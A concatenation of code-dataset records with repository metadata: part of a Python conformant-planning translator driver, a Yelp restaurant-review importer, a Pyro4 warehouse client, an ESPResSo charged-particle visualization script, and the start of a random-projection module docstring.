cmd.extend(['-x',str(extra_room)])
cmd.extend(['-k',str(k),'-f','-o','full@'+ cnf_nf,'-o','init@'+ init_nf,\
'-o','auxvars@'+auxvars_nf,\
'-o','rfluents@'+ rfluents_nf,'-o','ifluents@'+ ifluents_nf,'-o','atoms@'+ atoms_nf,\
'-o','actions@'+ actions_nf,'-o','actions2time@'+ actions2time_nf,\
'-o','isprob@'+ isprob_nf,'-o','vars2prob@'+ vars2prob_nf,\
domain_nf,new_problem_nf])
pr(gen_log('Generating CNF'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cconf=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=log_f, env={'C2D': Loc+'/c2d_220'} )
tokill.append(cconf.pid)
res = cconf.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling cconf: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
isprob = is_prob( isprob_nf )
if isprob:
print 'Probabilistic domain detected'
if method != 'cf2mc' and isprob:
pr('Error method %s doesn\'t support probabilistic confomant planning' % method)
sys.exit(1)
if exit_when_cnf:
pr('Cnf is ready...')
sys.exit(1)
if(n_atoms_init < 0):
init_f = open(init_nf,'r')
n_atoms_init = int(init_f.readline().split(' ')[2])
init_f.close()
if enum_s0: # For printing initial states and exit
do_enum_s0(n_atoms_init,atoms_nf,init_nf)
sys.exit(0)
if new_cnf == []:
matoms = Atoms(atoms_nf,auxvars_nf)
if use_lug:
new_cnf = mlug.get_cnf(matoms,n_atoms_init)
elif extra_room > 0: # anulate extra vars
new_cnf = []
for v in matoms.extravars:
new_cnf.append([-v])
elif use_lug and use_lug_last_again:
new_cnf_layer = mlug.get_cnf_layer(k)
new_cnf.extend(new_cnf_layer)
if use_lug or extra_room > 0:
concatenate_cnf(cnf_nf, new_cnf)
concatenate_cnf(init_nf, new_cnf, False, True)
if use_lug:
simplify_cnf(cnf_nf)
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf_f.close()
if(num_s0s < 0):
num_s0s = calc_num_s0s(init_nf)
stat_f.write('NUM_S0:'+str(num_s0s)+'\n')
if dump_qbf:
make_qbf(k,n_atoms_init,problem_nf,cnf_nf,atoms_nf,init_nf,actions_nf)
finish()
sys.exit(0)
if(not isprob and not consistent):
consistent = is_consistent(n_atoms_init, init_nf, cnf_nf)
if(consistent):
pr('Problem has at least one plan candidate since horizon ' + str(k))
if(isprob or consistent):
# Probably -smooth_all should be prefer, but
# it seems to make cf2mc failure over some block instance
cmd2 = [Loc+'/c2d_220','-in',cnf_nf,'-dt_method','3','-force',ifluents_nf,\
'-exist', rfluents_nf, '-smooth_all','-reduce','-keep_trivial_cls']
cmd2.append('-count')
pr(gen_log('Compiling from CNF to d-DNNF'))
log(gen_log('--------- Calling',cmd2))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
c2d=subprocess.Popen(cmd2, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(c2d.pid)
res = c2d.wait();
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling c2d: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
if(not isprob and not rconsistent):
rconsistent = is_really_consistent(n_atoms_init, num_s0s, actions_nf, nnf_nf)
if(rconsistent):
pr('Problem has at least one plan candidate for each s0 since horizon ' + str(k))
if(isprob or rconsistent):
if method == 'cf2sat':
found, plan_atoms = cf2sat(nnf_nf, n_atoms_init, cnf2_nf, actions_nf )
elif method == 'cf2mc':
found, plan_atoms = cf2mc(nnf_nf, n_atoms_init, num_s0s, actions2time_nf,\
vars2prob_nf )
if not found:
pr('solution not found')
if not isprob:
continue
else:
pr('solution FOUND')
pr('LAST_HORIZ='+str(k))
atom2fluent = calc_atom2fluent(atoms_nf)
pr('Plan: ')
plan=[]
for atom in plan_atoms:
action = atom2fluent[atom]
pr(str(atom2time[atom])+':'+str(action))
plan.append(action)
statline += '\nPLAN_LENGTH:' + str(len(plan_atoms))
save_plan(plan)
plan_found=True
break
if(not plan_found):
pr(gen_log('Plan not found: Horizont limit reached'))
def mysatplan(num_solutions):
global statline, plan_found, parallel, erasedebug, erase
global init_horiz, end_horiz
# Translating problem so, it doesn't use oneof
new_problem_nf=problem_nf+'2'
erasedebug.add(new_problem_nf)
os.system(Loc+'/oneof2clause.py '+problem_nf+' '+new_problem_nf)
#cf2sat files
base='full'
init_nf=base+'-init.cnf'
cnf_nf=base+'.cnf'
atoms_nf=base+'.atoms'
actions_nf=base+'.actions'
vars2prob_nf=base+'.vars2prob'
auxvars_nf=base+'.auxvars'
resolve='resolve_trace'
erase.add(resolve)
erasedebug.add(init_nf)
erasedebug.add(cnf_nf)
erasedebug.add(atoms_nf)
erasedebug.add(actions_nf)
erasedebug.add(auxvars_nf)
consistent=False
n_atoms_init = -1
num_s0s = -1
new_cnf = []
for k in range(init_horiz,end_horiz+1):
if statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nvars2 nclauses2 sat-time\n'
else:
stat_f.write(statline+'\n')
statline = ''
statline += str(k) + ';'
pr('===== Horiz %d ===============' % k)
cmd=[Loc+'/cconf']
if(parallel):
cmd.extend(['-p'])
# -s for not simplifyng the theory using C2D
cmd.extend(['-s','-k',str(k),'-f','-o','full@'+ cnf_nf,\
'-o','init@'+ init_nf,\
'-o','auxvars@'+auxvars_nf,\
'-o','atoms@'+ atoms_nf,\
'-o','actions@'+ actions_nf,\
domain_nf,new_problem_nf])
pr(gen_log('Generating CNF'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cconf=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=log_f, env={'C2D': Loc+'/c2d_220'} )
tokill.append(cconf.pid)
res = cconf.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling cconf: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
if exit_when_cnf:
pr('Cnf is ready...')
sys.exit(1)
if(n_atoms_init < 0):
init_f = open(init_nf,'r')
n_atoms_init = int(init_f.readline().split(' ')[2])
init_f.close()
if enum_s0: # For printing initial states and exit
do_enum_s0(n_atoms_init,atoms_nf,init_nf)
sys.exit(0)
if new_cnf == []:
matoms = Atoms(atoms_nf,auxvars_nf)
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf_f.close()
if(num_s0s < 0):
num_s0s = calc_num_s0s(init_nf)
stat_f.write('NUM_S0:'+str(num_s0s)+'\n')
if(num_s0s > 1):
print 'Error: running mysatplan but num of initial states > s0'
print 'do you want tu run translator as a conformant planner?'
exit(1)
if(not consistent):
consistent = is_consistent(n_atoms_init, init_nf, cnf_nf)
if(consistent):
pr('Problem has at least one plan candidate since horizon ' + str(k))
if consistent:
found, all_plan_atoms = try_relsat(cnf_nf, actions_nf, num_solutions)
if not found:
pr('solution not found')
if not isprob:
continue
else:
pr('solution FOUND')
pr('LAST_HORIZ='+str(k))
atom2fluent = calc_atom2fluent(atoms_nf)
n=1
for plan_atoms in all_plan_atoms:
if num_solutions > 1:
pr('Plan ('+str(n)+'): ')
else:
pr('Plan: ')
plan=[]
for atom in plan_atoms:
action = atom2fluent[atom]
pr(str(atom2time[atom])+':'+str(action))
plan.append(action)
statline += '\nPLAN_LENGTH:' + str(len(plan_atoms))
if num_solutions > 1:
save_plan(plan,'.'+str(n))
else:
save_plan(plan)
n += 1
plan_found=True
break
if(not plan_found):
pr(gen_log('Plan not found: Horizont limit reached'))
# Init of main matters
init_horiz=0
end_horiz=100
parallel=True
dump_qbf=False
simple_prunning = True
strong_prunning = True
most_likely_selection = False
check_plan=False
do_debug=False
verbosity=10
extra_room=0
exit_when_cnf=False
use_lug=False
use_mutex=False
use_lug_last_again=True
use_lug_persist=False
use_lug_props = True
use_lug_effs = True
use_lug_acts = True
use_lug_last_layer = True
classical_planner='ff' # or 'lama'
extra_options = []
enum_s0 = False
num_solutions = 1
Loc_v='TRANSLATOR_HOME'
planner='translator'
remove_log=False
statline=''
cleaning_functions=[]
isprob=False
time_limit=0
# Default strategy
sstrategy='t0:1800'
prefix=''
plan_found=False
# files to keep on debug
erasedebug=set()
if len(sys.argv) < 3:
usage()
i=1
try:
while i < len(sys.argv):
if(sys.argv[i] == '-i'):
init_horiz = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-e'):
end_horiz = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-v'):
verbosity = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-s'):
sstrategy = sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-l'):
prefix = sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-t'):
time_limit = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-z'):
parallel = False
i += 1
elif(sys.argv[i] == '-qbf'):
dump_qbf = True
i += 1
elif(sys.argv[i] == '-f'):
remove_log = True
i += 1
elif(sys.argv[i] == '-c'):
check_plan = True
i += 1
elif(sys.argv[i] == '-d'):
do_debug = True
i += 1
elif(sys.argv[i] == '-nsol'):
num_solutions = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-nsim'):
simple_prunning = False
i += 1
elif(sys.argv[i] == '-nstr'):
strong_prunning = False
i += 1
elif(sys.argv[i] == '-lik'):
most_likely_selection = True
i += 1
elif(sys.argv[i] == '-x'):
extra_room = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-cnf'):
exit_when_cnf = True
i += 1
# Lug options
elif(sys.argv[i] == '-lug'):
use_lug = True
i += 1
elif(sys.argv[i] == '-mut'):
use_mutex = not use_mutex
i += 1
elif(sys.argv[i] == '-lper'):
use_lug_persist = not use_lug_persist
i += 1
elif(sys.argv[i] == '-lnag'):
use_lug_last_again = not use_lug_last_again
i += 1
elif(sys.argv[i] == '-ln_llay'):
use_lug_last_layer = not use_lug_last_layer
i += 1
elif(sys.argv[i] == '-lno_acts'):
use_lug_acts = not use_lug_acts
i += 1
elif(sys.argv[i] == '-lno_props'):
use_lug_props = not use_lug_props
i += 1
elif(sys.argv[i] == '-lno_effs'):
use_lug_effs = not use_lug_effs
i += 1
#cf2cs options
elif(sys.argv[i] == '-cp'):
classical_planner=sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-trans'):
extra_options.extend(sys.argv[i+1].split(','))
i += 2
elif(sys.argv[i] == '-enum-s0'):
enum_s0 = True
i += 1
elif(sys.argv[i].startswith('-')):
usage()
else:
break
except:
print 'Error processing the options', sys.argv
sys.exit(1)
# If last file is a tar, assume it contains both files
[has_tar,domain_nf,problem_nf] = pddlsfromtar.get_pddls(sys.argv[i])
if i + 1 == len(sys.argv) and has_tar:
erasedebug.add(domain_nf)
erasedebug.add(problem_nf)
elif i + 2 > len(sys.argv):
usage()
else:
domain_nf=sys.argv[i]
problem_nf=sys.argv[i+1]
if(not os.access(os.path.abspath(domain_nf),os.F_OK) ):
print 'domain file %s does not exist' % domain_nf
sys.exit(1)
if(not os.access(os.path.abspath(problem_nf),os.F_OK) ):
print 'problem file %s does not exist' % problem_nf
sys.exit(1)
# Interchange problem_nf and domain_nf if passed different
for l in file(problem_nf,'r'):
if '(define' in l and '(domain' in l:
tmp=problem_nf
problem_nf=domain_nf
domain_nf=tmp
print 'Domain and problem file interchanged. Usually the results are the same anyway\n'
break
# problem name
probname=problem_nf.split('/')[-1].split('.')[0]
if prefix == '':
out=planner+'_'+strategy_name+'_'+probname
else:
out=prefix+'_'+probname
#output files
log_nf=out+'.log'
if(os.access(os.path.abspath(log_nf),os.F_OK)):
if(remove_log):
weak_unlink(log_nf)
else:
print 'log file exist:', log_nf
print 'erase it before or use \'-f\' option to overwrite it'
sys.exit(1)
log_f=open(log_nf,'w')
if use_lug and (not use_lug_acts and not use_lug_props and not use_lug_effs):
pr('Using lug, at least acts props or effects should be used')
sys.exit(1)
Loc=''
try:
Loc=os.environ[Loc_v]
if(Loc == '' or not os.access(Loc,os.F_OK)):
pr('Enviroment var',Loc_v,'is not set to an existing directory')
sys.exit(1)
except:
pass
if Loc == '':
Loc='.'
print 'Assuming than all required files are on current directory\n'
valid_translation=set(['satplan', 'satmemless', 'sat', 'mc', 'k0', 't0', 'only-t0', 'old-t0', 'k1', 'only-k1', 's0', 'fs0', 't0c', 't0n', 't0s', 'kp'])
strategy=[]
strategy_name=''
for step in sstrategy.split(';'):
pair = step.split(':')
if(len(pair) != 2):
pr('Strategy bad formed. Run %s without arguments to obtain help' % planner)
sys.exit(1)
translation=pair[0].strip()
if(not translation in valid_translation):
pr('Invalid translation: %s. Run %s without arguments to obtain help' % (translation, planner))
sys.exit(1)
t=pair[1].strip()
if(t != 'inf' and not t.isdigit()):
pr('bad formed time: %s. Run %s without arguments to obtain help' % (t, planner))
sys.exit(1)
if(strategy_name == ''):
strategy_name = translation+'-'+t
else:
strategy_name += '_'+translation+'-'+t
strategy.append((translation, t))
pr('%s: a translation-based conformant planner' % planner.upper())
pr('UPF - 2006')
pr('')
cmdline = 'calling: '
for i in range(0,len(sys.argv)):
cmdline += sys.argv[i] + ' '
pr(gen_log(cmdline,date=True))
pr('Log file %s' % log_nf)
pr('Strategy -> '+sstrategy)
stat_nf=out+'.stat'
weak_unlink(stat_nf)
stat_f=open(stat_nf,'w')
print >> stat_f, 'Problem file:',problem_nf
print >> stat_f, 'Domain file:',domain_nf
try:
pwd=os.environ['PWD']
print >> stat_f, 'Working directory:',pwd
except:
pass
ipc5_nf=out+'.ipc5'
weak_unlink(ipc5_nf)
time_nf=out+'.time'
weak_unlink(time_nf)
tmpdir=os.environ['PWD']
# Pids of process started
pids=set()
# files to erase
erase=set()
# Set the signal handler and a alarm
signal.signal(signal.SIGINT, killall)
signal.signal(signal.SIGTERM, killall)
def call_translation(translation):
# Straight forwar sat plan, good for generating many optimal plans for learning purpose
if(translation=='satplan'):
mysatplan(num_solutions)
# Not done yet
elif(translation=='satmemless'):
sat_memory_less()
# Complete translations using Prop Logic
elif(translation=='sat'):
cf2logic('cf2sat',dump_qbf)
elif(translation=='mc'):
cf2logic('cf2mc')
# Complete translations to Classical Planning
elif(translation=='k0'):
cf2cs('cf2cs','-k0')
elif(translation=='t0'):
cf2cs('cf2cs','-ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='only-t0'):
cf2cs('cf2cs','-ak1 -static_disj -actcomp')
elif(translation=='old-t0'):
cf2cs('cf2cs','-t0 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='k1'):
cf2cs('cf2cs','-k1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='only-k1'):
cf2cs('cf2cs','-k1 -static_disj -actcomp')
elif(translation=='s0'):
cf2cs('cf2cs','-s0 -static_disj -actcomp')
elif(translation=='fs0'):
cf2cs('cf2cs','-fs0')
# For verifying consistency
elif(translation=='t0c'):
cf2cs('cf2cs','-pconsistent -ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
# Options for cf2cs old version (in C++)
elif(translation=='t0n'):
cf2cs('cf2cs','-k0 -and -ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='t0s'):
cf2cs('cf2cs','-t0 -and -s0')
elif(translation=='kp'):
cf2cs('cf2cs','-kp -mac')
else:
pr('bad translation in strategy: ', translation)
sys.exit(1)
def do_timeout(translation):
global statline
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
pr('Time out for %s.' % translation)
clean_children()
stat_f.write(statline+'\nTIMEOUT\n---------------\n')
statline=''
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
lost_used = 0
try:
for translation, t in strategy:
if(plan_found): break
if(t == 'inf'):
if(time_limit <= 0):
rtime='inf'
else:
rtime = time_limit - global_time()
elif(t.isdigit()):
if(time_limit <= 0):
rtime = int(t)
else:
rtime = min(int(t), time_limit - global_time())
else:
pr('ill formed time in strategy: ', time)
sys.exit(1)
if(rtime <= 0):
do_timeout(translation)
break
stat_f.write('Translation:'+translation+'\n')
pr('Calling translation %s during %s' % (translation,rtime))
if(rtime == 'inf'):
call_translation(translation)
else:
t = int(rtime)
lost = lost_wall_clock()
t += lost-lost_used
lost_used = lost
pr('Recovering %s second lost' % lost_used)
try:
timeout.TimedOutFn(call_translation, int(t), translation)
except timeout.TimedOutExc:
do_timeout(translation)
except IOError, e:
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
pr('Ending abruptly. Last operation failed. See log file '+log_nf)
clean_children()
final_time=global_time()
if(plan_found and check_plan):
cmd=[Loc+'/verify','-plan',ipc5_nf,domain_nf,problem_nf]
pr(gen_log('--------- Calling',cmd))
verify=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=log_f )
tokill.append(verify.pid)
isvalid = False
for l in verify.stdout.readlines():
pr(l)
if(l.startswith('valid plan')):
isvalid=True
statline += '\nVALID:'
if(isvalid):
statline += 'YES'
else:
statline += 'NO'
res = verify.wait()
tokill.pop()
if(res < 0):
pr('Error calling verify: %d' % res)
statline += '\n'
finish()
sys.exit(0)
|
PlanTool/plantool
|
code/Uncertainty/T0/translator/translator/translator.py
|
Python
|
gpl-2.0
| 68,757
|
[
"VisIt"
] |
44c82bfafc77ede013a0c443dd65050fa05995ca5655579f0a3a7eb72fcc9bcf
|
"""Helper methods to import yelp data"""
import json
from pprint import pprint
import numpy as np
import re
import cPickle as pickle
import os.path
VEGAS_RESTAURANTS_PATH = "pickles/get_restaurants_vegas.p"
PHOENIX_RESTAURANTS_PATH = "pickles/get_restaurants_phoenix.p"
EDINBURGH_RESTAURANTS_PATH = "pickles/get_restaurants_edinburgh.p"
WATERLOO_RESTAURANTS_PATH = "pickles/get_restaurants_waterloo.p"
MADISON_RESTAURANTS_PATH = "pickles/get_restaurants_madison.p"
VEGAS_REVIEWS_PATH = "pickles/get_reviews_vegas.p"
PHOENIX_REVIEWS_PATH = "pickles/get_reviews_phoenix.p"
EDINBURGH_REVIEWS_PATH = "pickles/get_reviews_edinburgh.p"
WATERLOO_REVIEWS_PATH = "pickles/get_reviews_waterloo.p"
MADISON_REVIEWS_PATH = "pickles/get_reviews_madison.p"
def get_pheonix_restaurants():
"""
Get All Phoenix restaurant.
Returns:
All Phoenix restaurants as a list of restaurant dictionaries objects.
"""
return get_restaurants("Phoenix", PHOENIX_RESTAURANTS_PATH)
def get_vegas_restaurants():
"""
Get All Vegas restaurant.
Returns:
All Vegas restaurants as a list of restaurant dictionaries objects.
"""
return get_restaurants("Las Vegas", VEGAS_RESTAURANTS_PATH)
def get_edinburgh_restaurants():
"""
Get All Edinburgh restaurant.
Returns:
All Edinburgh restaurants as a list of restaurant dictionaries objects.
"""
return get_restaurants("Edinburgh", EDINBURGH_RESTAURANTS_PATH)
def get_waterloo_restaurants():
"""
Get All Waterloo restaurant.
Returns:
All Waterloo restaurants as a list of restaurant dictionaries objects.
"""
return get_restaurants("Waterloo", WATERLOO_RESTAURANTS_PATH)
def get_madison_restaurants():
"""
Get All Madison restaurant.
Returns:
All Madison restaurants as a list of restaurant dictionaries objects.
"""
return get_restaurants("Madison", MADISON_RESTAURANTS_PATH)
def category_bag_of_words(restaurants):
"""
Get bag of words representation of restaurant's categories.
Parameters:
restaurants - a list of restaurant dictionary objects
Returns:
A bag of words dictionary, key-value pairings are category->category count.
"""
bag = {}
for restaurant in restaurants:
categories = restaurant["categories"]
for c in categories:
bag[c] = bag.get(c,0)+1
return bag
def get_restaurants(city_string, pickle_path=None):
"""
Get all restaurants in a city.
Parameters:
city_string - the city
pickle_path - optional path for storing and retrieving method results from pickle
Returns:
All restaurants in the specified city as a
list of restaurant dictionary objects.
"""
if pickle_path and os.path.exists(pickle_path):
print "Loading pickle..."
return pickle.load( open(pickle_path, "rb" ))
f = open('yelp_dataset/yelp_academic_dataset_business.json', "r")
print "Reading Restaurant JSON..."
lines = [line for line in f]
f.close()
businesses = [json.loads(line) for line in lines]
restaurants = [business for business in businesses\
if business["city"] == city_string\
and "Restaurants" in business["categories"]]
restaurants = np.array(restaurants)
if pickle_path:
pickle.dump( restaurants, open( pickle_path, "wb" ))
return restaurants
def get_vegas_reviews():
"""
Get all Vegas reviews.
Returns:
All Vegas reviews as a single string.
"""
return get_reviews_from_restuaraunts("Las Vegas", VEGAS_REVIEWS_PATH)
def get_phoenix_reviews():
"""
Get all Phoenix reviews.
Returns:
All Phoenix reviews as a single string.
"""
return get_reviews_from_restuaraunts("Phoenix", PHOENIX_REVIEWS_PATH)
def get_edinburgh_reviews():
"""
Get all Edinburgh reviews.
Returns:
All Edinburgh reviews as a single string.
"""
return get_reviews_from_restuaraunts("Edinburgh", EDINBURGH_REVIEWS_PATH)
def get_waterloo_reviews():
"""
Get all Waterloo reviews.
Returns:
All Waterloo reviews as a single string.
"""
return get_reviews_from_restuaraunts("Waterloo", WATERLOO_REVIEWS_PATH)
def get_madison_reviews():
"""
Get all Madison reviews.
Returns:
All Madison reviews as a single string.
"""
return get_reviews_from_restuaraunts("Madison", MADISON_REVIEWS_PATH)
def get_reviews_from_restuaraunts(city_string, pickle_path):
"""
Get all reviews for a city.
Parameters:
city_string - the city
pickle_path - optional path for storing and retrieving method results from pickle
Returns:
All reviews for a city as a single string.
"""
total_reviews = 0
if pickle_path and os.path.exists(pickle_path):
print "Loading pickle"
return pickle.load( open(pickle_path, "rb" ))
restaurants = get_restaurants(city_string, None)
relevant_restaurant_ids = {restaurant["business_id"] for restaurant in restaurants}
f = open('yelp_dataset/yelp_academic_dataset_review.json', "r")
print "Reading Review JSON..."
lines = [line for line in f]
f.close()
print "Done Reading Review JSON..."
print "Parsing Review JSON..."
reviews = [json.loads(line) for line in lines]
print "Done Parsing Review JSON..."
restauraunt_id_to_review_text = {}
for review in reviews:
business_id = review["business_id"]
if business_id in relevant_restaurant_ids:
val = restauraunt_id_to_review_text.get(business_id, "")
review_text = review["text"]
newVal = val + review["text"]
restauraunt_id_to_review_text[business_id] = newVal
total_reviews+=1
pickle.dump(restauraunt_id_to_review_text, open( pickle_path, "wb" ))
print total_reviews
return restauraunt_id_to_review_text
def get_words_from_text(text, stop_words = {}):
"""
Get a list of words from a given text.
Parameters:
text - the text to be parsed into words
stop_words - optional set of words to be ignored in the text
Returns:
A list of words from the text, in order, consisting of only
non-numeric alphanumeric characters and not containing any
words in the stop_words set.
"""
cleaned_text = re.sub('\\n', ' ', text)
cleaned_text = re.split('[\s,.()!&?/\*\^#@0-9":=\[\]$\\;%]|--', cleaned_text)
cleaned_text = [x for x in cleaned_text if x!='' and x not in stop_words]
return cleaned_text
def get_topic_labels():
"""
Get all topic labels.
Returns:
A list of all 50 topic labels as strings.
"""
labels = [\
"Buffet/Upscale",
"Steak & Eggs",
"Tacos",
"Mexican",
"Pho",
"Seafood/Buffet",
"Sports Bar",
"Nightlife",
"Brunch",
"Ramen",
"Chinese",
"Seafood",
"Dim Sum",
"Vegan/Healthy",
"Tapas",
"Upscale",
"Buffet",
"Indian",
"Burgers",
"Greek",
"Fish & Chips",
"Street Vendors",
"Korean BBQ",
"Mexican/Bar",
"Italian",
"Pizza",
"BBQ",
"Burgers",
"Thai",
"Waffles/Brunch",
"Bad Service",
"Luxe",
"Dessert",
"Sushi",
"Deli",
"Asian/Authentic",
"Burritos",
"Steakhouse",
"Exotic American",
"Wine/Upscale",
"Cafe",
"Upscale",
"Sushi",
"Soup",
"Oysters",
"Casino/Hotel",
"Noodles",
"Chinese",
"Buffet",
"Prime Rib",
]
return labels
|
harinisuresh/yelp-district-clustering
|
DataImporter.py
|
Python
|
mit
| 7,566
|
[
"CASINO"
] |
dd3b136f0e9b89d8d7cdc5cf60293b8735fe17ee41ae8ae090cb86fb3607ad25
|
# This is the code that visits the warehouse.
import sys
import Pyro4
import Pyro4.util
from person import Person
sys.excepthook = Pyro4.util.excepthook
warehouse = Pyro4.Proxy("PYRONAME:example.warehouse")
janet = Person("Janet")
henry = Person("Henry")
janet.visit(warehouse)
henry.visit(warehouse)
|
irmen/Pyro4
|
examples/warehouse/phase3/visit.py
|
Python
|
mit
| 305
|
[
"VisIt"
] |
bfd836dfc2a5c495d07b2c4f168d5a7609bfec99f11a73e4a6b588ae5ac73f01
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Visualize a simulation with a pool of particles with various charges,
LJ parameters and masses.
"""
import espressomd
from espressomd.minimize_energy import steepest_descent
from espressomd.visualization_opengl import openGLLive
from espressomd import electrostatics
import numpy as np
required_features = ["P3M", "LENNARD_JONES", "MASS"]
espressomd.assert_features(required_features)
box = [40, 40, 40]
system = espressomd.System(box_l=box)
system.cell_system.set_domain_decomposition(use_verlet_lists=True)
visualizer = openGLLive(system, background_color=[1, 1, 1],
drag_enabled=True, drag_force=10)
# TIMESTEP
time_step_fs = 1.0
system.time_step = time_step_fs * 1.0e-2
system.cell_system.skin = 1.2
# TEMPERATURE
SI_temperature = 400.0
kb_kjmol = 0.0083145
temperature = SI_temperature * kb_kjmol
# COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon) in Angstrom*kJ/mol
epsilon_r = 4.0 # dimensionless
epsilon_0 = 8.8541878128e-12 # units of [C^2/J/m]
q_e = 1.602176634e-19 # units of [C]
avogadro = 6.022e23 # units of [mol]
prefactor = q_e**2 / (4 * np.pi * epsilon_r * epsilon_0) # units of [J.m]
# convert energies to kJ/mol, with distances in Angstroms
coulomb_prefactor = prefactor * avogadro / 1000 * 1e10
# FORCE FIELDS
# distances in Angstroms, epsilons in kBT, masses in g/mol
species = ["Cl", "Na", "Colloid", "Solvent"]
types = {"Cl": 0, "Na": 1, "Colloid": 2, "Solvent": 3}
charges = {"Cl": -1.0, "Na": 1.0, "Colloid": -3.0, "Solvent": 0.0}
lj_sigmas = {"Cl": 3.85, "Na": 2.52, "Colloid": 10.0, "Solvent": 1.5}
lj_epsilons = {"Cl": 192.45, "Na": 17.44,
"Colloid": 100.0, "Solvent": 50.0}
lj_cuts = {"Cl": 2.0 * lj_sigmas["Cl"], "Na": 2.0 * lj_sigmas["Na"],
"Colloid": 1.5 * lj_sigmas["Colloid"],
"Solvent": 2.0 * lj_sigmas["Solvent"]}
masses = {"Cl": 35.453, "Na": 22.99, "Colloid": 300, "Solvent": 18.0}
n_ionpairs = 50
for i in range(n_ionpairs):
for t in ["Na", "Cl"]:
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
n_colloids = 30
t = "Colloid"
t_co = "Na"
for i in range(n_colloids):
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
for i in range(int(abs(charges[t]))):
system.part.add(pos=box * np.random.random(3),
q=charges[t_co], type=types[t_co], mass=masses[t_co])
n_solvents = 800
t = "Solvent"
for i in range(n_solvents):
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
def combination_rule_epsilon(rule, eps1, eps2):
if rule == "Lorentz":
return (eps1 * eps2)**0.5
else:
return ValueError("No combination rule defined")
def combination_rule_sigma(rule, sig1, sig2):
if rule == "Berthelot":
return (sig1 + sig2) * 0.5
else:
return ValueError("No combination rule defined")
# Lennard-Jones interactions parameters
for i in range(len(species)):
for j in range(i, len(species)):
s = [species[i], species[j]]
lj_sig = combination_rule_sigma(
"Berthelot", lj_sigmas[s[0]], lj_sigmas[s[1]])
lj_cut = combination_rule_sigma(
"Berthelot", lj_cuts[s[0]], lj_cuts[s[1]])
lj_eps = combination_rule_epsilon(
"Lorentz", lj_epsilons[s[0]], lj_epsilons[s[1]])
system.non_bonded_inter[types[s[0]], types[s[1]]].lennard_jones.set_params(
epsilon=lj_eps, sigma=lj_sig, cutoff=lj_cut, shift="auto")
energy = system.analysis.energy()
print("Before Minimization: E_total = {:.2e}".format(energy['total']))
steepest_descent(system, f_max=1000, gamma=30.0, max_steps=1000,
max_displacement=0.01)
energy = system.analysis.energy()
print("After Minimization: E_total = {:.2e}".format(energy['total']))
print("Tune p3m")
p3m = electrostatics.P3M(prefactor=coulomb_prefactor, accuracy=1e-1)
system.actors.add(p3m)
system.thermostat.set_langevin(kT=temperature, gamma=2.0, seed=42)
visualizer.run(1)
|
KaiSzuttor/espresso
|
samples/visualization_charged.py
|
Python
|
gpl-3.0
| 4,820
|
[
"Avogadro",
"ESPResSo"
] |
e2b73afb93dfba7d50c9424e54f0fe76093c5a5fae6f7c5ce76c935f01b6bea4
|
# -*- coding: utf8
"""Random Projection transformers
Random Projections are a simple and computationally efficient way to
reduce the dimensionality of the data by trading a controlled amount
of accuracy (as additional variance) for faster processing times and
smaller model sizes.
The dimensions and distribution of Random Projections matrices are
controlled so as to preserve the pairwise distances between any two
samples of the dataset.
The main theoretical result behind the efficiency of random projection is the
`Johnson-Lindenstrauss lemma (quoting Wikipedia)
